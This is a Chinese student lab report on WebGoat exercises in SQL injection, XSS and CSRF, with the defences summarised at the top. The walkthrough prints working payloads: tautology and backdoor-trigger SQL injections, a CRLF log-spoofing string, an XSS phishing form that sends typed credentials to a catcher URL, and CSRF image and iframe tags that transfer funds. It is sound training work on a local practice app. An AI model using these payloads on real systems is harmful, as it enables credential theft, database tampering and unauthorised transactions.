Web安全基础
jar包,密码:9huw
实验问题回答
- SQL注入攻击原理,如何防御
- 原理:恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对未对插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。
- 防御:
- 限制查询长度
- 限制查询类型(权限)
- 过滤非法字符
- 正则表达式过滤传入参数
- 预编译语句集PreparedStatement
- XSS攻击的原理,如何防御
- 原理:XSS是代码注入的一种,它允许恶意用户将代码注入到网页上,并能够被浏览器成功的执行,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。主要目的是想办法获取目标攻击网站的cookie,有了这些信息就可以在任意能接进互联网的pc登陆该网站,并以其他人的身份登陆,做一些破坏。
- 防御:
- 对输入和URL参数进行过滤
- 在输出数据之前对潜在的威胁的字符进行编码、转义
- CSRF攻击原理,如何防御
- 原理:跨站请求伪造,通过伪装来自受信任用户的请求来利用web server
- 防御:
- 验证请求中的Token
- 验证 Referer
- 添加加随机验证
- 设定cookie域
目录
WebGoat
我们本次的实验在WebGoat平台上进行
WebGoat是OWASP组织研制出的用于进行web漏洞实验的应用平台,用来说明web应用中存在的安全漏洞。WebGoat运行在带有java虚拟机的平台之上,目前提供的训练课程有很多,包含了XSS、线程安全、SQL注入等。
参考资料:webgoat学习笔记
- 普通安装,命令行输入
java -jar webgoat-container-7.0.1-war-exec.jar - 浏览器转:
localhost:8080/WebGoat登陆,开始练习
SQL攻击
1、String SQL Injection
- 根据题目要求输入:
Smith,可以看到查询的相关信息,语句为SELECT * FROM user_data WHERE last_name = 'Smith'
- 为了看到所有的用户,注入一个永真式
'or 1='1,攻击成功
2、Database Backdoors
- 题目使用string SQL注入来执行多个语句
- 首先验证一下语句,在
user ID输入101; update employee set salary=5000,可以看到更新的数据
- 进行注入
101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHEREuserid = NEW.userid创建后门
3、Numeric SQL Injection
- 通过注入字符串查看所有的天气,在任意一个option值的后面j加入一个永真式
1=1
- 对源码进行修改(firebug在升级后整合了,所以可以直接在开发者工具中开打开控制台进行l调试就可以了参考链接)
- 攻击成功
4、LAB:SQL Injection
- stage1跟上一个原理相似,在密码栏中输入
or 1=1 --进行SQL注入 - 失败,查看源码发现是对输入长度进行了限制,修改源码再次注入,成功
- stage3的话浏览员工信息需要点击
ViewProfile,在网页代码中分析一下这个按钮,发现这个地方是以员工ID作为索引传递参数的,通过Larry来浏览Neville账户信息的话,就要重新order一下,修改value值为101 or 1=1 order by salary desc --
- 查看到该账户
5、Log Spoofing
- 利用换行符伪造一个假的日志信息,登陆欺骗。使得用户名为“admin”的用户,在日志中显示“成功登录”
- 在User Name文本框中输入
cz%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行。 - 成功登陆
XSS攻击
1、Phishing with XSS
- 在搜索框中直接输入要进行xss的攻击代码。参考编写,添加一个form可以让用户输入用户名和密码,再使这些信息能够发送给网站并显示
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
- 点击search,出现表单,输入信息,点击登录,弹出捕获信息,攻击成功
2、Stored XSS Attacks
- 创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容
- 命名title(随意),在message里输入一串js代码:
<script>alert("surprise!");</script> - 点击刚刚创建的帖子,弹出窗口
3、Reflected XSS Attacks
- 输入错误用户信息后,服务器校验输入有误,返回错误页面并将错误内容展示。如果输入一个攻击URL就会返回该信息。
- 输入
<script>alert("surprise!");</script>,提交
CRSF攻击
1、Cross Site Request Forgery(CSRF)
- 写一个URL放进Message框,使其他用户不可见,设置成一个隐藏图片,用户一旦点击就会触发一个CSRF事件
- 在Message里输入
<img src="http://localhost:8080/WebGoat/attack?Screen=&menu=900&transferFunds=5000" width="1" height="1" /> - 点击该消息,页面就会下载这个消息并显示,就会执行转走用户的存款
2、CSRF Prompt By-Pass
- 查看页面下侧Parameters中的src和menu值,命名title,message框中输入代码:
<iframe src="attack?Screen=[scr]menu=[menu]&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=[scr]&menu=[menu]&transferFunds=CONFIRM"> </iframe>
- 查看消息,看到转账消息。
心得体会
这次的实验加深了对三个攻击的理解,实战其实还是挺有意思的,攻击同时也能去想怎样防御才是最好的,收获还是很多。